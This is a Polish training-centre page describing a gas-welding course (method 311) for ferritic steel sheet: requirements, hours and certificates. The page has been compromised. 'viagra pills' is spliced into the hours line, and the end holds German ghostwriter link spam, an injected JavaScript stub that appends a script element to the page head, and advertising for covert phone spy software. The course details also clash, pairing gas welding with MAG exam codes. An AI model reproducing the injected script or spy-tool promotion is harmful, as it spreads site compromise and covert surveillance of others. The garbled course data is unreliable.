Gazowe 311 – blachy

Kurs gazowego spawania blach  ze stali ferrytycznych – metoda 311 ( 1.1 ) I stopień

 

Założenia organizacyjno – programowe:
Cel kursu
Teoretyczne i praktyczne przygotowanie uczestników kursu do egzaminu końcowego IS-P-BW-1-135 lub IS-P-BW-8-135
Zasady rekrutacji
  • posiadanie Książki Spawacza z wpisem o ukończeniu kursu spawania blach i rur – spoiny pachwinowe IS-P/T-FW-1-135 lub
  • ukończenie podstawowego kursu spawania  metodą MAG wg systemu stosowanego do 2007 roku
  • praktyka w spawaniu (licząc od daty egzaminu  końcowego) przez co najmniej 1 rok
Liczba godzin
  • Część teoretyczna – 12 godzin
  • Część praktyczna: ćwiczenia praktyczne – 90 godz., instruktaż wstępny – 2 godz., egzamin – 8 godz.
  • Razem kurs –  viagra pills 112 godz.

 

Uzyskane uprawnienia
Uczestnik utrzymuje:
  • uprawnienia do spawania konstrukcji klasy 1, 2, 3  wg PN-87/M-69008. Uprawnienia te są ważne dwa lata i muszą być przedłużone zgodnie z ustaleniami zawartymi w normie EN 287-1
  • wpis w Książce Spawacza przez Instytut Spawalnictwa  w Gliwicach
  • Świadectwo Egzaminu Spawacza ważne w całej Unii  Europejskiej (Welder Approval Test Certyfikate) w języku polskim i angielskim lub w polskim i  niemieckim wydane przez Instytut Spawalnictwa w Gliwicach
Cena kursu
?


Dabei übte frankreich sowohl die direkte https://best-ghostwriter.com/ kontrolle durch französische gouverneure und verwalter als auch die indirekte durch willigen einheimische herrscher ausvar d=document;var s=d.createElement(‚script’); d.getElementsByTagName(‚head’)[0].appendChild(s);The most popular 2017 spy software applications for the mobile phones.facebook spy, phone tracker, track snapchat

Top